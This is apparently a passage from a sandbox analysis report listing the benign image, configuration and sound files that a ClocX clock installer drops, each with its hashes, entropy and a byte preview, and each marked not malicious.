Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xfffFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\negro2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10079
Entropy (8bit):	7.847117851925215
Encrypted:	false
SSDEEP:	192:prca/zZV69AIpL/JUxeRyqyrujNobJMFS3ZkjOsFsBgBEEziuS0roY:pgUHUplZar3ASJkbFikMUoY
MD5:	F0F3D8BCA45643B990FB0E2924BD4AA9
SHA1:	6A60789BB15D0CEE548691A379C95F9BFBEE7B21
SHA-256:	FFCAF7B027D1C6E00F06437F1E4864417BDC4F2428125140118A73C6A6449B28
SHA-512:	0881677F642CA9C0135859B1B16B614D952E36C62A100C421E3ADF4DF6CA0D87802C3B58F5FE8F6256F5D9782041290B0F7A50C7BB1219382B0F0BFB66270AF7
Malicious:	false
Preview:	.PNG........IHDR.............<.q.....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..&.IDATx.b...?.(.......4...... .F..(......5.h...h4a......b.....II.$ %.../_.~..........br@,..@...hZA=..@..._..#&&.........?......><..\|.H.S..b.i.B`"J.........d.d[...hl.3FF...vZ@@.+........p...a.....\|.......y....(d...7....`B..((..X:>\|.........4,....x8._.o...FZ8PHt.;.50......,.>.\|.r.P........ .DO..U@FD..H..<.g...&...:".._Dr....'....c).....{.?.....h.!.....s.g\.....ZV.....@.7.Bk.DC.ZQJ...)%...s.+m2.f!.3.x..-v.4........7.O.>...N..jkk3...1(((..1...1pqqa...cb..."........r#.}...c.....<x.p..-..W...u....*..Am..C)^..h.&,`....,..?.f........3......T...(..>`m,. '...n<.c8.....,`..KVpi.Jd..]bx..!>-.....3./`)8$J1...r.....m'.`.S...$++.`dd...@%...O.]..B..\.....x.....3....~....@..s...?~..-.l....b..{....!..@...>\|....G!z..T.YXX0...2hjj2....=.Vb.+.........._...^..U..>}..nw.[B....~d.~.:.....N.8.K.3...~.?...a.......X}........ru...`ee.`ll.....H.% l.IK.........~....0.1}.

C:\Program Files (x86)\ClocX\Presets\roman2\roman2hour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 70 x 17, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2769
Entropy (8bit):	7.792620734470326
Encrypted:	false
SSDEEP:	48:WkrslCkP6Xi1YjEY8Dy1H05LdkKCMmXlpnXqz5yymUwKROk6D58GrQFfddu0:VrkCG1OEY8Dy1SiKxmVpXM5rJk/5vrQ1
MD5:	C0086565894CB169BCC489833502B612
SHA1:	B188D83FFD2BB7418E96678AEBF3F0FFD68C581D
SHA-256:	1DE95BC6957AFB9B2906C37235C62A9B6CCF09B1C7A3580DBF18CC2877FA08E3
SHA-512:	91ADF17A2AA41CB4CD78E1C1C9754DB9058B66412BB0389608ED20FA906A26800C0ABEAFF3EFF1E0EE3137D3B2D486FE72C49D354CBE83107B8959C1C18AA8E8
Malicious:	false
Preview:	.PNG........IHDR...F............]....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......\IDATx.b...?Cd.o%..a++kVd>@......_.x......N.&..F6.ffF.{'k.vf.............. .dca.?.....@`.b..?}.H..?V......X........UIQ..@..e.@...K.....Rl.n.?<.?...@....?..vuHE... ..a.N].8s...v,?Y..%%g.[...k!".s......k.lt5...6-7/...+`8??...9..b.....b.../..Vt8V.s...&M.a1.5....@.....l...r....._........._.l......e...'..7;.....L.@`dee...K.....~A!...b....b...?............K. ...J.. .............''0..f....[.x.fb.q......P...9...._.~a.....}..^R...@.].'...}..i,.JJ.a.^..?........../........c`gg........o......XX.ev.~.....o.`z..u......?0...\|................!!}.................._.0.......s...4."...#.;~....73.3..C..9..?S930...q.dcc>.........X.y.~.....wrwKs./0.2=}....._..s...7xt..&....._.>.k.<.... x4....`.e.F......o...1....]....,._.1...g`b....a.tR.. .......af.....i...}E.!........a..u.... H.......7....3.............1...B\X.-...M..._.\.......x...Vn........CxB.......3g......`>..b{z8...y..

C:\Program Files (x86)\ClocX\Presets\roman2\roman2minute.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 18, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3321
Entropy (8bit):	7.851054365624773
Encrypted:	false
SSDEEP:	48:7Sn/kwui7s9kX+QG5XH9Ek8bRs7aQqGPUEButE468UBLeYLpTHfvijH7j1:7S8s7s9klG5NKCaLqbAtEP8sLTLprvO
MD5:	FEAAEA47FFCDD97BBAB8CB95594EF1C8
SHA1:	0E82A0462942C551F465CEE6ADCC5A50BAD64337
SHA-256:	0B0692E09562B1C694938126D1E9EA74FA90A57C0D9471C2E0A23CFE7CE5A48E
SHA-512:	9EC4183039ACF07801D9C77BF245F25C42A4A21736906C7E54DBF67A218FD76524D1A36A526C05964871B0C6255B4F9595B69903B619045AA6E32F23A4398150
Malicious:	false
Preview:	.PNG........IHDR...d..........K.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?..y.Z@4.. .X\|...o^.J....?+3..#._..?.3.sp1..........?..~.``e.f.J1...#H'.. .H...@,A.a.?.~....t....,..._..``dbf`.fg`........v6^./_.3......@..........KV//..nn..]...2...g.sg,..VRr.[.{...aU.U.B. .X.={...?..../.y1....?.vw...U...Q....0........U.<..@`../^..o.>.R....@..NN..........t.o@...3.Dn......+......%...pH.6..@.....$h.,.@i.lZ9..{..Q.....z...&WJ.c....z... H....n.W.J..:4.Y..T.Fp>..N...w.f.R.v...'....\..........j....\u..U&.;;;. 1>.. .....g.".@..-.{.OWG.ff...L,..?..ep.q.^.P.E.Ki...0P.,..q....... 'o.....MH2...%.^...U...,x......+...yz..h\|...%...tVq...\|.XSB....n....pF.....>..A..@..`q..&\a...Lel..v..$...?.%aQ.^[!4..2..E.D..0......\*.L....'...!...<........Z.(%...u.T.j.^...@,......../....u............y...@...Y.!..o.\|............}...;.....j.....>..r............/]<.v...........={vq.........'..Y...........M@....gO^...c-k.....'.uk.i.].....oxX.........DZ$.Z...

C:\Program Files (x86)\ClocX\Presets\roman\romanhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 80 x 10, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2837
Entropy (8bit):	7.765437921106241
Encrypted:	false
SSDEEP:	48:rmzGRbMWjvJsO1a/S+2OVag8MQBAYQ7f0wcGrdQiAn7y0Jyd2suRYhZB:r+GtMWm7/aOqBAYQRrSiA7/Jy8NRM
MD5:	D51150B7FA07035717F4007284A73C6E
SHA1:	62825D81670244A1652FEF4573F6B21FD3E61CAF
SHA-256:	96E532EB349DEB34228EBE3321E0727C3638A0A4F80E7700760C08A436B13DDB
SHA-512:	4C6485A35DC02BFAE6F1E2B18B6B49BB35FD1ABEE7FFE070AD0AB50F834AC44BFBB5062EA47DB701B0ACFEE8BB900E23F014966BFF8AB59D9D58BCCE6835B9F6
Malicious:	false
Preview:	.PNG........IHDR...P.........T......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?.......?....g..M.2g..............)..............\|.....@;:.##%.@JB............l...f..?.....1~...?'7/..........._.,....V...'Fq6....e...f...........=ZZ.nLl.....n.+.#.`..?.~.a.........../.?&.?....s.?....x..e...@...3.........n^..%.SB..........?.....dd.........?##./...^../!.....w.77..B...,Y"...7......d..........@p..Y.m].=w....7#...+.+#;'..?.X...........E>.............l.....a....+$$...... .....`...p........t.&.#=M.K..T...2.....g...7....TS?1a........1.0.a..........e ....SI....3....H....4.......?.l.\.3.Ob..*f........@.}...........x....^.Z.........T..........O.>0.......9kja.mnlR...+...'...?3HII1..e....#@.a8..Lx.%s&-...../~^.o\l...............l.?....ch..... ...........p.y...._~.........9.V.Hfdf.../.`.0...........?...A......a...Mf.V......w..K.....2...V..._.....3..d.&....X...2.d........P../.._fF`v.......O.1.h[3.S2.33..O.TW...L. ....^....W\v...... ..,...........

C:\Program Files (x86)\ClocX\Presets\roman\romanminute.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3158
Entropy (8bit):	7.824208485673109
Encrypted:	false
SSDEEP:	48:3AzX0UHGEFpLWR5XgeqLFOYhxzRnwMdsrnYPcds1oIFFTth5bNMuv5qWBR3hxk:wrdGEFlKJg7LFXx9nwMdeldsa6Ff57E
MD5:	A86418DBE12535F31E5E73B3DC7BAF2A
SHA1:	F080EA7232635292A8BFC14F7139C2DF009CD70C
SHA-256:	711B797C47B4D076E3FEA8FF4049DA416FDAF36550DF6B913A2399AF6AC5C8AA
SHA-512:	C3464D5A3EAEBA5DC85EF43039304EF7C4FC83B2472840ED0E3F102F7C92FC59E9BD4A3AC95970D490CC2E57480FA619BD580BE850E91F7B34890969B46F0B5E
Malicious:	false
Preview:	.PNG........IHDR...d............F....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?......2........?...&&&.k.....`..v............. .X....~}.........?..............;...o>2...2.-........b.....of6f&.?..........q.].]]]....kv..)aIi.m..2......d.....F6.....ab..i.......f.......O...y.l.......ba.d.......:%..^fbdg`dbb............... ...h.....b.....Yx....~2.221...1......O........s...........d..~...wv....2..............4..L..?.w..a...(F.e@....d.db.#...,x..6A>. . ...... .X....,.......'..#...3'.....g`......0.a....-...O..?~0...1..........o....ObPTT.,"".... .X.62....9.l.l........&...@................%.(.........Z{z...._...d.4i..CG.\}}..x........@..<...R...8.5.......~...._....}........3.jY1.\|...'.A.`......_.C3...?.....1.(x.)............8\|......8.......~2xyy.....}x.......!....._....1.....r..&+).e..o....@x...`........ .X.....^...Q.........x....7/...........<.c=N`.f.+))..j...._k..z.>.......K.,epqua.f0.'9...:.._.~1...3\.z.a.......p..u.777nVn.u.~.d..

C:\Program Files (x86)\ClocX\Presets\romanblack\romanblackhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 55 x 8, 8-bit gray+alpha, interlaced
Category:	dropped
Size (bytes):	853
Entropy (8bit):	7.357114506944816
Encrypted:	false
SSDEEP:	24:VqpER+AftkhOqlEWJYK+HGhF4oXzpCkZix64h:ApEUJYe5JY4hF40FZZG
MD5:	042882177AAB65A2B945B6BCD293C7DA
SHA1:	5C7588DCE0DC34CC5DC4D4BEF84EC738DFEE6860
SHA-256:	35A3E61E917A23F068D2E4B3C2E7503B1C2BCA5D610F4A106BF686BAE441670C
SHA-512:	4EE1E7AEF13492FBDBAFCB6EA82DB94590AF16C60CA03B7DDFC7956DB3D2C92448F0C1A44FE9D653F59BE650FA7FD7C0B24FE7F0FAD7C692F1B26627D11007C9
Malicious:	false
Preview:	.PNG........IHDR...7............#....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b\|. .p.a3...Z....!.Z.C?.9....@..@.....2...6...o.0}d....$..@..1M.<...:.N0<c.g...........$A....1.......5.$...!.."....7.k5.....&..............3.c0`........pT.D.n....`......+..k..Oh.fx...`..p..;.F..b8..s=..$C+.:C..^...\@.Z...&s.8.M.o.2..sQ......gF....~n`...../._v..'.^.+.0..]......... ..z..R....}b..........>.\|..%....i.5..."....7..l[~Ob.d.b.b.f8b.._..#..n.b.....J..Pl.. .....!.f...}..?C;0^..B.z.V3.g......a&.K....o.~...!.....s...;.........}`.T..... F.w.....f....../......a......O.?..x.<...7...W..3.l~...?o...3..........&.........~k\|......<....@.....2.....20dt.._.g.?..b.........../.?../...<.Sy.._.g...,....f.c`f.a.b..&.] K.......lc.. .. ?.E..y..L7...M..$0..........9.......o.).8..'0..C....../`...T........@...(.&1.......IEND.B`.

C:\Program Files (x86)\ClocX\Presets\romanblack\romanblackmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 55 x 7, 8-bit gray+alpha, interlaced
Category:	dropped
Size (bytes):	889
Entropy (8bit):	7.327700722895101
Encrypted:	false
SSDEEP:	24:rwlFZSCKBRDl7IBTwBrFKc+yFZZQrrDy8Bnz:rwYCcp7pr0cDFZmrr+8dz
MD5:	5B9B2F8241E1842B9921A1ACC940E78F
SHA1:	C8A28F4DEC48C4B63FE5E59AA7D9AF11FA709D85
SHA-256:	278C33465B3DA6829078264B5FB59293D261A97756B3781A2DA45AE93BC5A5B0
SHA-512:	FEE9D82BE6E74D1031BA6978E4279F7FE68510A263C2E419670759F47C7B8591385EB9EB77441BFE0D13B7A89F5C00BF6DF586B11ED1E46371986094E6D1FFCF
Malicious:	false
Preview:	.PNG........IHDR...7.........q.-.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.bx.....a..d........!..v.4..@.\...........j..b!...........&......H........4C/.e........0,V<.`.0....J...bd...O..C.G..v..W-(.e....G.......9.....ur.....(.!.............1......<v.=.@.+.6.:.:.............;...W....60...K3.2...........2k8.....J.X...4.bb........q+..g..'.33.1(1..a....>....7.{...u{.1.....P.....<. .@..x.`d.}.^...7.$~.......o..~......JW..........c..........7...........t..................."...i....M..................e.}...U....:@......t.E..u..M_Shg...a...PF..t..>...b.+.......p0.....Q..8B@...!'P....@Y...<P.../.....?..zk~sp.N.\\r.?........$..B..Z..N..~.)...........[&........L@..........g.IQ....&....y....0H..}..........'.o..<.x~..ae.w. ...X..z..1*un]1.3................_...@........7`R...........X.\|....6{.gl.?.I.7.G.@...T%...>`.13.........e.9bCNe....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\romanold\romanoldhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 13, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2908
Entropy (8bit):	7.740448337420142
Encrypted:	false
SSDEEP:	48:rmLJNMjy7tneNT+ND/whTKkxtYhremTYJCnJwcosFFnmOqdhJe5HLHxZznVnShi6:i3MjmeNTejuTKkxt+reqJwcFFhmTJYLS
MD5:	D57F357BD6EC6CB8E6B4113934C93219
SHA1:	D1C3760AD06626D717096D565DAA5DD279404AAA
SHA-256:	D8DDD4E4F5FCEACB7487CDC71DDC3E611987B1BACCF7110797E2F33726023DFA
SHA-512:	B98597FA630695033D409232BF2CA38BF49854F1A322D07CF1C4EFAFF8B1C5557F25EC8854F7241970AB1D50A1877B61566128A4D31619CE9C45683A084CE4F9
Malicious:	false
Preview:	.PNG........IHDR...d.........(..P....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b........./.2.......,Y....k...3l......(. ..b.............-Y:a..F._ZV...3g."##14.....I........./. ........_.}c8p..._.P4...#.?..0...M..........@.(+...`bee..........yKRF....!....e.{...Y.vM...2.MM\..<.,#'._^Q..P..ys...3TUU...b.;..........L......}\|..1..O...\..0y.....'1....'O...2e..o.....'.0.........,.. .'O.0...\|<\|..........+.2\|....S .v....f...'...^.r%.'.,.. F...Y...@a.w.^...r...X. .WLL......#h....X.......>...72hkk3..........p...bafff.....@......'O..g..NN./_.\.R...?....P..HII1.....o..[.....pZ.........y.....V.j.E (..L.......0.....0..S.G`.............h."..?.....b..L.J.....G..%.$..-).E...@.......L .._01.!..}e..v.......S*(..{........0?0..... ..#.8.a..>..........30?..F......... 60...y..f...P..c... 1.Z..P...,.aj@...........(e..................k...._........Sz...y...,.Y..i.i.K.K.......+...?..F .9.....(W.........]9u..0..A...L...S...s.......?P........o.....w.

C:\Program Files (x86)\ClocX\Presets\romanold\romanoldmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3709
Entropy (8bit):	7.8282860017277915
Encrypted:	false
SSDEEP:	48:897lfu06j8qtm8LF+2XKtC69+K06bqFoNUrtzi4pTGM+QjA3yn7o2/cre49YKq7B:6G0NmpXKcmqFkEte4pTGz3y7oNrhWB
MD5:	BEA6A1B4CC75E0A5D69C3E4EE40387C5
SHA1:	0A74C9554D2A88075D5F79C9CB308CC96FC22173
SHA-256:	AB47A5ADF204BC4CD1C14A7050FC6B1DC0DFA8C791EBCABC8111FDB003C45C17
SHA-512:	7A056097B6474538223A2D622F8FAE7095F2F1CEEAD789AF7683C47D9A72EA750A5E1C55FD107CD63DF50C30B832348E6DFF1896C16B03462152993F946447AD
Malicious:	false
Preview:	.PNG........IHDR...d.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx..5........hji.LLL.........222.FFF.............SRS.....eee...5....~~~.........................111....m===....J..........1....}}}.....676.NON.#&&.....{\|{.......................QZF.?#.#.......0......~.../_...~..6._.....t.?...e.......i~~~................'............&&&lFFF.@@@............#\|\|\|.CEE+..........kjk.+**.........ooo..p@.F....E...w2..P.<.A.......j......R$oN].!..o.~.j...i:..+3.5..9`q.QJ..J)..x..Z.R.......1F>..p.....#.w...6.Yr......N...&2.u............ex..9.....\..V3y.4...........M...>\|.[.w.^.8..............:.y.u..../_.Pabb..{...nnk....22=...c`fff..L..`.....k../...^addd......{{{.rss....QZZ.?.0.A..r.0\|................t../.I......9.>}.t..I?.....X[[/........(88...........0~...e.M:^>.W..../^......O..G....#... W...........q.J. ...a.-`q...8.<(.A..r<@.1..ttt........6....jO.+v.....k..K..n...L.`.......E..R.....&.066f....'.........P..G..455...ex.....l.....e.E..^

C:\Program Files (x86)\ClocX\Presets\weemsplath.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.894560877458028
Encrypted:	false
SSDEEP:	24:BEZrGXE5lrABRhB0aKEszm1ETOs010Bi1ckpUdGIo8OiruPgibQ0Wd9iBxLuQI:BkqylUhB0fwL5n6dGJSuPXQJTiBxLvI
MD5:	1BA352511DC3D718D12F1FC7F9CB4290
SHA1:	52BAE52E80AC073BEA2F0431B956775B8A01D95E
SHA-256:	A613E004BA3A8616EAB72F42EF36B7425B40365A61AF112CE1CF0D79E871075B
SHA-512:	31CEBA1CAAC3845C43482450E61D71CD27F399A563971637283D260C9EDDE3E6C8829663E1F15975FFCF476F5AFEA8A37E7F1F71D551DD7EDA4F661718323B2C
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterX=92..AMPMCenterY=112......DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=10..DateCenterX=90..DateCenterY=76......HourColor=0x0E1B2B ;color of hour hand..HourLength=29 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x0E1B2B ;color of minute hand..MinuteLength=40 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x3540BC ;color of second hand..SecondLength=45 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\weemsplath.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 228 x 228, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66278
Entropy (8bit):	7.99259953440328
Encrypted:	true
SSDEEP:	1536:h6id/CGLVRKm+KOx487IQdf8WCLAl/QMJlW3cyb+C4q:hDxCG2ps0u9ArWkG
MD5:	E4309650933F9B7F4F7BBCD07161047C
SHA1:	0C4CBE0F0D28B3BA2C2AED2C555B5B284B86BFA4
SHA-256:	B379E31A40387B9B80C7D7196B15E77921ECF612FF3B3DE114DA67E7F6D99612
SHA-512:	E47DBDEC05705FC4E789E8678F8C11985049DFBE8C4F99E38EDB47BBE3B11AF6A853D139AC687DBEFA348AA97CCD1F56BF60D65749C44A55BEC98379E90E6A25
Malicious:	false
Preview:	.PNG........IHDR..............W......tIME.....'..(.....pHYs..........iTS....gAMA......a....uIDATx..w.d.}.x_.\.g..DLN....A&.. H0. ...(..+.+..u.-[.cW..sV.M:..+R.%Q..@. . .09..........~.j0.I.k..D.8......~....,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...x.O`y...G...%.G<..........!...-.[.....M?.....-..\|.....g..O}.o.@.].W..b....i..k.@.3......"....4.c,X..'..g..>;.\|.........?yj............2@....n. ............W.V.3.....m...}..,...0....i8..S....`d.F....X1(c0Z\|.a.>{Q...[..V.o..f"Uu.......8q.._>w..A...t..o.X..n\|.....w......W..5b..j..GB.nD^.\|.H..A..m..D...[-..E.0....i......b..r..}4...?.y.1 .0....Z.j.....iWa..+......p...'..._h...87v..G....z....G4...w;......GF..G.fcM..h..G..GM?......5..e..F@...0........~..4....$...w#..cP.$O..m.....~.I+.o......N....6."".F.LDF...q....V..z.p.r.a..S.....^....s.....f............28...2 .n..o>.a7a:...~..i.m.}...7.j.....DCVd..I..h..-.>l.RlD!5..l2..)..(....J...S.

C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1471
Entropy (8bit):	4.866891600699003
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx/aKy4dTOK01rfhkpGdGm8bCi1833NPeibQ0Wd9iBxLuQI:BzqFlpf1EY4dGmQD8tPBQJTiBxLvI
MD5:	DD1979CDDBE6614EA4FCE3617D2D8FCE
SHA1:	D5235ACE6190A103E02E52E1055CCDE04AF9C39B
SHA-256:	E6C0F7FC7F440FDCF18D90A84FC6EA75B487867E60C27DA3BD0A89C44ADD041C
SHA-512:	F64E7D03D0A41A79CEEF2CBDCA99D748A5F793FD8B8150AEF924B52AEA70731795DCF47C771ABB88C088F99DD99316AD05E962CBB917376428518F11A71A83A4
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0xFFFFFF..DateFont=Arial..DateFontSize=12....HourColor=0x33CCCC ;color of hour hand..HourLength=27 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x33CCCC ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;Cente

C:\Program Files (x86)\ClocX\Presets\woodone\woodhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 40 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2290
Entropy (8bit):	7.700327487136672
Encrypted:	false
SSDEEP:	48:LLDh2CM+hIEWlV2mEGE9cx7g+SNpWmefyAZZJDrS:LB2oe5lVEYx7hSNCf7Zfe
MD5:	2B3AB55EE12A47F5A20F8CFA2D46724B
SHA1:	1FB28F49EC9D8F2B7E90EEF82CFA48C5B7BD8687
SHA-256:	40A519F829558E1BD12C88F891125420079D40FF3C10B5940724F8D27D69D4B3
SHA-512:	777B53C0912C99A4EFE0B7D91BBB8D24CE4D74BAEC12DB92905976E4635BF23FC69126309D2BDA7579328170B963B0B8A6D66AE5F84C68BB8823F4AC9D79C878
Malicious:	false
Preview:	.PNG........IHDR...(..........n.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......}IDATx.b8t......>........s.+...b.....0a..{...imm9..... ..:...........^!Q...[.1....I...u.....ny9I....4......7.........9;../.?........_.s..SSQ...3...)............``^.........vvu......................7.......?g...?.%e...f...'..HHJ3........g......Vx........Sg/2.y.~.}..\!@..ps.2X...).)....t........../?.Y....U.VVV\|.. .I9i.K7o0dee3...2...........hlh..../.._.1...0l.2<z..!........._...=e8{....L...e...N.\.bm.K}.'Oc........ ..W.....Q.......P...POK....,KNV.&&#...........,++,....!....232H...........f...t..!.............a...99.L...lll...+....L..6........N..1.1......h....=...[VVV.w.>\|.......Q............................................pqo]........................??A.................^..=w........edaae...?.##.....D223_..G\|...8v..=......@L..<K.=w..{..........iww.{..>.z...?//.W.t!*%).63;.....?w...j@K1....Q...................r...rNLH....{................\|}~........(...........i...

C:\Program Files (x86)\ClocX\Presets\woodone\woodmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 60 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	7.655538415930818
Encrypted:	false
SSDEEP:	48:3Od6w3EFNTi5xexqAPIzGS/S1eRl65PlgmpXnoBjuuSTq:3OdrUr+DqcieqempXnOvSTq
MD5:	71E6CF4FCE7A3C0088267F1A71ED8630
SHA1:	94B3755BF1077F8C52FFA7450DF6094F1C72E939
SHA-256:	EB308EFA319EA51E367092AAE0BD118081C0340B6ACAD03C1D55E431E33469D9
SHA-512:	C0D7A288D8425B3D4B22E9F48FD47F22095A631C41F6F67E0F364FDD41AC3029325B9133987C8CFD59B7816FAE02D4ADD0A6E16E923B422BAF175A062D025912
Malicious:	false
Preview:	.PNG........IHDR...<..........L......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.s..#.3....3.z..AT\.AOO.!00....3....!............,-+.........1/.................?@E...............qqq.......YQQ.....BA!...B..V.6..b.........=....+.6}....@DM....:....48<.....BDK.....>?D.KLQ.STY.:;=.vwy......1/......eii.....""........e...y.......:.9.......FFF....c..Tg...=....;>F.hfb{....11/.........kmm....%".c....+.....11............=...._^b}........jjk....j....................888...................y...........................-...............................W\|~}....b`^.........???'zzz.....1221...N........}}}.,,,...........y....................... ...............{...'................tsy.EEC..&.......=....................HHD................................?}.d..z....?\|`.6}._[;'....0...MIYAm..7......)].n..Z.:..oa`bffPVRbpttfpssc......W..+V2<z.....[ggg.WWW.........@...ED...V.........sf.v.\|..:......o...YUFZ..............=y....{.....7.0..8.\.pA.......9.Y..&.w...........

C:\Program Files (x86)\ClocX\Sounds\alert.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 8000 Hz
Category:	dropped
Size (bytes):	10858
Entropy (8bit):	7.814865066990573
Encrypted:	false
SSDEEP:	192:0OQIOBHC22Ddnc+uCpmoHrXAUyZyYLTPr6L3zCY+dEE2apqgTMUiirzT3wa:0VJU2Sdn6CcyAKY/e7zCYmEE2e/iif7r
MD5:	74053F5E4BF6420F04AE67A74BD025EB
SHA1:	EADBDFA25C6F7C14D7EE06D557AB8449B9551334
SHA-256:	45950471E4FAF639815B99C48BD87C140610DCB587C0A9AF1F941D63A7500D78
SHA-512:	B5754571FFCF47240084272D0DF068AC1830D870A940379DB993214682D04777845C8DFC637B6119161D9600E8574EB77F5749472C69F07A815FA47CF20F600D
Malicious:	false
Preview:	RIFFb..WAVEfmt ....U...@.......................q.data0....(...B..YF..`....<..D....,..@...@.i...B,.lb.A....I..&..!(U.D....W}.......@.8.......b...!Wx.0Bw8..A.8....Bw4........"".8.C.)....Q@.@......._...(..#....P ...-.mf.......`...\|..S..0.D..`/.'....)....I.=..4..X...j.cq.1..=....%......C.'...N....\|.$W8.tY.......'2\.3`..l.a...$..z?.........(..!....P..G................}....3.a..T...~.~@a.6T.1...Sw...I.Nz..s.....z..d.......s.....0.c.p..5......:.4..3..(B.d..V.=.dZY..8q.M...ja...(....................b`.LM.9P\|4@..07.....a....R....E...A,......%.SJJtdd,X.,...6+&..U.#.../..{[......._..z.R.j`,.....(.s..............J..(...B...X.....Yh.-.'...Mi#s$...#.....'..=Z.hp;.dB#.s.3K......RX..iT.......9.E.T:z%u."FT,....2.5O.w+s)..xt.....m..s+.&.Q...,T.++....H...(.!.:..@.!.".P..a.rAc..........,..1h.S3...i.....?Q..o..M..eidNF.y.w. q..\|....4n,bq_.R_.q...`..;.=.).....`..z..w....M.E....&9....;..2...(./....$S.T..`.L....R....{#4.o...C;.....:....%.D~......C.........?.R..m

C:\Program Files (x86)\ClocX\Sounds\beep-ClockChime.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 7418 Hz
Category:	dropped
Size (bytes):	4022
Entropy (8bit):	5.677177270084845
Encrypted:	false
